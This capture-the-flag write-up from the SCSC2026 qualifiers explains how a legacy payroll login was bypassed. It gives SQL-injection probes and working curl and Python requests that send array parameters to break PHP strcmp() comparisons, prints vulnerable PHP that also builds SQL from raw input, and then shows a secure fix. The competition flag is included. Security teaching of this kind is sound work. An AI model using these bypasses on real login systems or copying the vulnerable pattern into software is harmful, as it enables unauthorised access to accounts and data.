SCSC2026 Quals - Legacy HR Payroll - Web Exploitation Writeup

359 words

2 minutes

SCSC2026 Quals - Legacy HR Payroll - Web Exploitation Writeup

2026-02-17

Writeup

CTF

/

Security

/

Web Exploitation

Category: Web Exploitation

URL: http://sriwijayasecuritysociety.com:8002/

Flag: SCSC26{pHp_j4dUt_b1k1n_pUs1nG_k3p4L4}

Challenge Description#

A legacy payroll system login page requiring Employee ID (format: HR-XXXX-Y) and PIN Code authentication.

Initial Reconnaissance#

The login page features:

A form with “Employee ID” and “PIN Code” fields
Placeholder hint showing format: “HR-XXXX-Y”
POST method submitting to empid and pin parameters

1
$ curl -X POST -d "empid=HR-0001-1&pin=1234" http://sriwijayasecuritysociety.com:8002/
2
# Returns: Invalid credentials

Vulnerability Discovery#

Step 1: Testing SQL Injection#

1
# Basic SQL injection attempts
2
$ curl -X POST -d "empid=' OR '1'='1&pin=1234" http://sriwijayasecuritysociety.com:8002/
3
$ curl -X POST -d "empid=' OR 1=1#&pin=anything" http://sriwijayasecuritysociety.com:8002/

Result: All SQL injection attempts failed.

Step 2: Testing PHP Type Juggling#

PHP is notorious for its loose type comparison. Testing array parameters:

1
$ curl -X POST -d "empid[]=HR-0001-1&pin=1234" http://sriwijayasecuritysociety.com:8002/

Result: PHP error revealed!

1
Warning: strcmp() expects parameter 2 to be string, array given in /var/www/html/index.php on line 15

Vulnerability Analysis: strcmp() Type Juggling#

The error reveals the application uses strcmp() for credential comparison.

How strcmp() Works#

1
int strcmp ( string $str1 , string $str2 )
2
// Returns 0 if equal, <0 if str1 < str2, >0 if str1 > str2

The Vulnerability#

When strcmp() receives an array instead of a string:

It returns NULL (and emits a warning)
In PHP’s loose comparison: NULL == 0 evaluates to true
Since strcmp() returns 0 for equal strings, this bypasses authentication!

Vulnerable Code Pattern#

1
<?php
2
$empid = $_POST['empid'];
3
$pin = $_POST['pin'];
4

5
$user = $db->query("SELECT * FROM employees WHERE empid = '$empid'");
6

7
// VULNERABLE: loose comparison with strcmp
8
if (strcmp($user['pin'], $pin) == 0) {
9
    // Authentication successful - but strcmp returns NULL for array input!
10
    // NULL == 0 is TRUE in PHP!
11
}
12
?>

Exploitation#

Send both parameters as arrays to trigger the vulnerability:

1
$ curl -X POST \
2
  -d "empid[]=HR-0001-1&pin[]=1234" \
3
  http://sriwijayasecuritysociety.com:8002/

Result: Authentication bypassed! Flag revealed:

1
SCSC26{pHp_j4dUt_b1k1n_pUs1nG_k3p4L4}

Alternative Exploitation Methods#

Using Python Requests#

1
import requests
2

3
url = "http://sriwijayasecuritysociety.com:8002/"
4
payload = {
5
    "empid[]": "HR-0001-1",
6
    "pin[]": "1234"
7
}
8

9
response = requests.post(url, data=payload)
10
print(response.text)

Using Browser DevTools#

Open login page in browser
Open Developer Tools (F12)
Modify form HTML:

Change name="empid" to name="empid[]"
Change name="pin" to name="pin[]"

Submit the form

Secure Code Fix#

1
<?php
2
// 1. Validate input types
3
if (!is_string($_POST['empid']) || !is_string($_POST['pin'])) {
4
    die("Invalid input");
5
}
6

7
// 2. Use strict comparison (===) or hash_equals()
8
if (hash_equals($user['pin'], $pin)) {
9
    // Secure comparison - timing-safe and type-strict
10
}
11

12
// 3. For passwords, use password_verify() with hashed passwords
13
if (password_verify($pin, $user['hashed_pin'])) {
14
    // Proper password handling
15
}
16
?>